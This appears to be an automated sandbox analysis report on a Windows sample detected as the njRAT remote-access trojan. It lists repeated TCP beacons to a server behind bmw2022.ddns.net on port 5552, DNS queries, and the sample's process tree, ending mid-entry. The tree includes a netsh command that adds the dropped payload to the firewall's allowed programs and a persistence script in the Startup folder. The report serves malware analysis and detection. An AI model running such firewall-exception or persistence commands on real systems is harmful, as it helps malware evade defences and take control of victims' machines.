                                                                                                                                                                  Nov 3, 2023 18:55:04.083463907 CET497745552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:04.486587048 CET555249774156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:04.989577055 CET497745552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:05.254448891 CET555249774156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:05.895859957 CET497745552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:06.256479025 CET555249774156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:06.895812988 CET497745552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:07.188497066 CET555249774156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:08.069960117 CET497755552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:08.337347984 CET555249775156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:08.848998070 CET497755552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:09.137758017 CET555249775156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:09.661438942 CET497755552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:09.941709042 CET555249775156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:10.458312988 CET497755552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:10.745695114 CET555249775156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:11.348927021 CET497755552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:11.619805098 CET555249775156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:12.444905996 CET497765552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:12.751418114 CET555249776156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:13.364561081 CET497765552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:13.645697117 CET555249776156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:14.161676884 CET497765552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:14.430737972 CET555249776156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:14.958318949 CET497765552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:15.218012094 CET555249776156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:15.864543915 CET497765552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:16.125350952 CET555249776156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:16.897526026 CET497775552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:17.164506912 CET555249777156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:17.692708015 CET497775552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:17.954516888 CET555249777156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:18.583303928 CET497775552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:18.865717888 CET555249777156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:19.395807981 CET497775552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:19.656202078 CET555249777156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:20.192785978 CET497775552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:20.489810944 CET555249777156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:21.212483883 CET497785552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:21.477461100 CET555249778156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:22.083297968 CET497785552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:22.350028992 CET555249778156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:22.895823002 CET497785552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:23.160876036 CET555249778156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:23.692702055 CET497785552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:23.959569931 CET555249778156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:24.583324909 CET497785552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:24.847440004 CET555249778156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:25.527993917 CET497795552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:25.793736935 CET555249779156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:26.348937988 CET497795552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:26.617784977 CET555249779156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:27.161461115 CET497795552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:27.426333904 CET555249779156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:27.958304882 CET497795552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:28.243642092 CET555249779156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:28.864631891 CET497795552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:29.150551081 CET555249779156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:29.772870064 CET497805552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:30.252047062 CET555249780156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:30.895817995 CET497805552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:31.174226046 CET555249780156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:31.692683935 CET497805552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:31.959620953 CET555249780156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:32.583273888 CET497805552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:32.849637032 CET555249780156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:33.380338907 CET497805552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:33.650346041 CET555249780156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:34.246484041 CET497815552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:34.559902906 CET555249781156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:35.161391020 CET497815552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:35.432487965 CET555249781156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:36.052040100 CET497815552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:36.324666977 CET555249781156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:36.864554882 CET497815552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:37.136490107 CET555249781156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:37.661379099 CET497815552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:37.932275057 CET555249781156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:38.576415062 CET497825552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:38.837683916 CET555249782156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:39.348927021 CET497825552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:39.609528065 CET555249782156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:40.161386013 CET497825552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:40.421603918 CET555249782156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:41.052040100 CET497825552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:41.313277006 CET555249782156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:41.848965883 CET497825552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:42.126205921 CET555249782156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:42.631923914 CET497835552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:42.893567085 CET555249783156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:43.395745993 CET497835552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:43.656629086 CET555249783156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:44.286449909 CET497835552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:44.637559891 CET555249783156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:45.192643881 CET497835552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:45.454832077 CET555249783156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:46.083290100 CET497835552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:46.346566916 CET555249783156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:46.819969893 CET497845552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:47.097563982 CET555249784156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:47.661401033 CET497845552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:47.926873922 CET555249784156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:48.458318949 CET497845552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:48.725064039 CET555249784156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:49.364559889 CET497845552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:49.629348993 CET555249784156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:50.161429882 CET497845552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:50.425410032 CET555249784156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:50.881458044 CET497855552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:51.147322893 CET555249785156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:51.692656040 CET497855552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:51.956845045 CET555249785156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:52.489583015 CET497855552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:52.761382103 CET555249785156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:53.395793915 CET497855552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:53.693412066 CET555249785156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:54.380168915 CET497855552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:54.660703897 CET555249785156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:55.085077047 CET497865552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:55.352133036 CET555249786156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:55.895787954 CET497865552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:56.373076916 CET555249786156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:56.880150080 CET497865552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:57.233685970 CET555249786156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:57.895797968 CET497865552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:58.199786901 CET555249786156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:58.895736933 CET497865552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:55:59.385241985 CET555249786156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:59.773778915 CET497875552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:00.371535063 CET555249787156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:00.958286047 CET497875552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:01.611316919 CET555249787156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:02.161364079 CET497875552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:02.791109085 CET555249787156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:03.364507914 CET497875552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:03.866995096 CET555249787156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:04.458268881 CET497875552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:04.934912920 CET555249787156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:05.304852009 CET497885552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:05.950715065 CET555249788156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:06.489537001 CET497885552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:07.020143032 CET555249788156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:07.583265066 CET497885552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:07.946619034 CET555249788156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:08.583329916 CET497885552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:09.132528067 CET555249788156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:09.692687035 CET497885552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:09.962167978 CET555249788156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:10.303947926 CET497895552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:10.573427916 CET555249789156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:11.161367893 CET497895552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:11.429377079 CET555249789156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:12.052066088 CET497895552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:12.321285009 CET555249789156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:12.864512920 CET497895552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:13.133397102 CET555249789156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:13.661380053 CET497895552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:13.931427002 CET555249789156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:14.256607056 CET497905552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:14.517918110 CET555249790156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:15.051989079 CET497905552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:15.313594103 CET555249790156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:15.864515066 CET497905552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:16.143268108 CET555249790156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:16.661354065 CET497905552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:16.922370911 CET555249790156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:17.552006960 CET497905552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:17.813860893 CET555249790156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:18.179794073 CET497915552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:18.450772047 CET555249791156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:19.083241940 CET497915552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:19.350635052 CET555249791156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:19.895787954 CET497915552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:20.166929007 CET555249791156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:20.692643881 CET497915552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:20.960536003 CET555249791156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:21.583736897 CET497915552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:21.850713968 CET555249791156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:22.131824970 CET497925552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:22.395816088 CET555249792156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:22.958277941 CET497925552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:23.221189022 CET555249792156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:23.864504099 CET497925552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:24.127347946 CET555249792156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:24.661406994 CET497925552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:24.925406933 CET555249792156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:25.552011967 CET497925552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:25.819108009 CET555249792156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:26.085293055 CET497935552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:26.357989073 CET555249793156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:26.895775080 CET497935552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:27.213304043 CET555249793156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:27.895893097 CET497935552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:28.170495987 CET555249793156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:28.692811966 CET497935552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:28.965643883 CET555249793156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:29.474061012 CET497935552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:29.747740984 CET555249793156.196.162.149192.168.2.4

                                                                                                                                                                  UDP Packets

                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                  Nov 3, 2023 18:52:33.519340992 CET5341653192.168.2.41.1.1.1
                                                                                                                                                                  Nov 3, 2023 18:52:33.615197897 CET53534161.1.1.1192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:53:34.524842024 CET5982753192.168.2.41.1.1.1
                                                                                                                                                                  Nov 3, 2023 18:53:34.619623899 CET53598271.1.1.1192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:54:38.975713015 CET6134753192.168.2.41.1.1.1
                                                                                                                                                                  Nov 3, 2023 18:54:39.072300911 CET53613471.1.1.1192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:55:38.475537062 CET5836853192.168.2.41.1.1.1
                                                                                                                                                                  Nov 3, 2023 18:55:38.574671030 CET53583681.1.1.1192.168.2.4

                                                                                                                                                                  DNS Queries

                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                  Nov 3, 2023 18:52:33.519340992 CET192.168.2.41.1.1.10x7dddStandard query (0)bmw2022.ddns.netA (IP address)IN (0x0001)false
                                                                                                                                                                  Nov 3, 2023 18:53:34.524842024 CET192.168.2.41.1.1.10xd791Standard query (0)bmw2022.ddns.netA (IP address)IN (0x0001)false
                                                                                                                                                                  Nov 3, 2023 18:54:38.975713015 CET192.168.2.41.1.1.10xda9dStandard query (0)bmw2022.ddns.netA (IP address)IN (0x0001)false
                                                                                                                                                                  Nov 3, 2023 18:55:38.475537062 CET192.168.2.41.1.1.10xd938Standard query (0)bmw2022.ddns.netA (IP address)IN (0x0001)false

                                                                                                                                                                  DNS Answers

                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                  Nov 3, 2023 18:52:33.615197897 CET1.1.1.1192.168.2.40x7dddNo error (0)bmw2022.ddns.net156.196.162.149A (IP address)IN (0x0001)false
                                                                                                                                                                  Nov 3, 2023 18:53:34.619623899 CET1.1.1.1192.168.2.40xd791No error (0)bmw2022.ddns.net156.196.162.149A (IP address)IN (0x0001)false
                                                                                                                                                                  Nov 3, 2023 18:54:39.072300911 CET1.1.1.1192.168.2.40xda9dNo error (0)bmw2022.ddns.net156.196.162.149A (IP address)IN (0x0001)false
                                                                                                                                                                  Nov 3, 2023 18:55:38.574671030 CET1.1.1.1192.168.2.40xd938No error (0)bmw2022.ddns.net156.196.162.149A (IP address)IN (0x0001)false

                                                                                                                                                                  Statistics

                                                                                                                                                                  CPU Usage

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  Memory Usage

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                  Behavior

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  System Behavior

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:0
                                                                                                                                                                  Start time:18:52:19
                                                                                                                                                                  Start date:03/11/2023
                                                                                                                                                                  Path:C:\Users\user\Desktop\ESjy0irMIn.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Users\user\Desktop\ESjy0irMIn.exe
                                                                                                                                                                  Imagebase:0x150000
                                                                                                                                                                  File size:1'078'272 bytes
                                                                                                                                                                  MD5 hash:536018D01EE05BC37064C480178E2BF8
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:2
                                                                                                                                                                  Start time:18:52:21
                                                                                                                                                                  Start date:03/11/2023
                                                                                                                                                                  Path:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\ProgramData\dotNetFx40_Client_setup.exe"
                                                                                                                                                                  Imagebase:0x10000
                                                                                                                                                                  File size:887'896 bytes
                                                                                                                                                                  MD5 hash:61446FDD76788229D3EBAEABE84DF38C
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:3
                                                                                                                                                                  Start time:18:52:21
                                                                                                                                                                  Start date:03/11/2023
                                                                                                                                                                  Path:C:\ProgramData\essam@sasa2023.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\ProgramData\essam@sasa2023.exe"
                                                                                                                                                                  Imagebase:0x750000
                                                                                                                                                                  File size:176'128 bytes
                                                                                                                                                                  MD5 hash:7266F0DBCD9D7EE7F4618A70D3CB53EE
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000002.4199118899.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                  • Detection: 79%, ReversingLabs
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:4
                                                                                                                                                                  Start time:18:52:23
                                                                                                                                                                  Start date:03/11/2023
                                                                                                                                                                  Path:C:\b53dd3b256ba71dad061693a386e\Setup.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\b53dd3b256ba71dad061693a386e\\Setup.exe /x86 /x64 /ia64 /web
                                                                                                                                                                  Imagebase:0x9a0000
                                                                                                                                                                  File size:78'152 bytes
                                                                                                                                                                  MD5 hash:006F8A615020A4A17F5E63801485DF46
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:5
                                                                                                                                                                  Start time:18:52:30
                                                                                                                                                                  Start date:03/11/2023
                                                                                                                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:netsh firewall add allowedprogram "C:\ProgramData\essam@sasa2023.exe" "essam@sasa2023.exe" ENABLE
                                                                                                                                                                  Imagebase:0x1560000
                                                                                                                                                                  File size:82'432 bytes
                                                                                                                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:6
                                                                                                                                                                  Start time:18:52:30
                                                                                                                                                                  Start date:03/11/2023
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:7
                                                                                                                                                                  Start time:18:52:34
                                                                                                                                                                  Start date:03/11/2023
                                                                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Name.js"
                                                                                                                                                                  Imagebase:0x7ff726ad0000
                                                                                                                                                                  File size:170'496 bytes
                                                                                                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:8
                                                                                                                                                                  Start time:18:52:35
                                                                                                                                                                  Start date:03/11/2023
                                                                                                                                                                  Path:C:\ProgramData\essam@sasa2023.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\ProgramData\essam@sasa2023.exe"
                                                                                                                                                                  Imagebase:0x3c0000
                                                                                                                                                                  File size:176'128 bytes
                                                                                                                                                                  MD5 hash:7266F0DBCD9D7EE7F4618A70D3CB53EE
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:11
                                                                                                                                                                  Start time:18:52:36
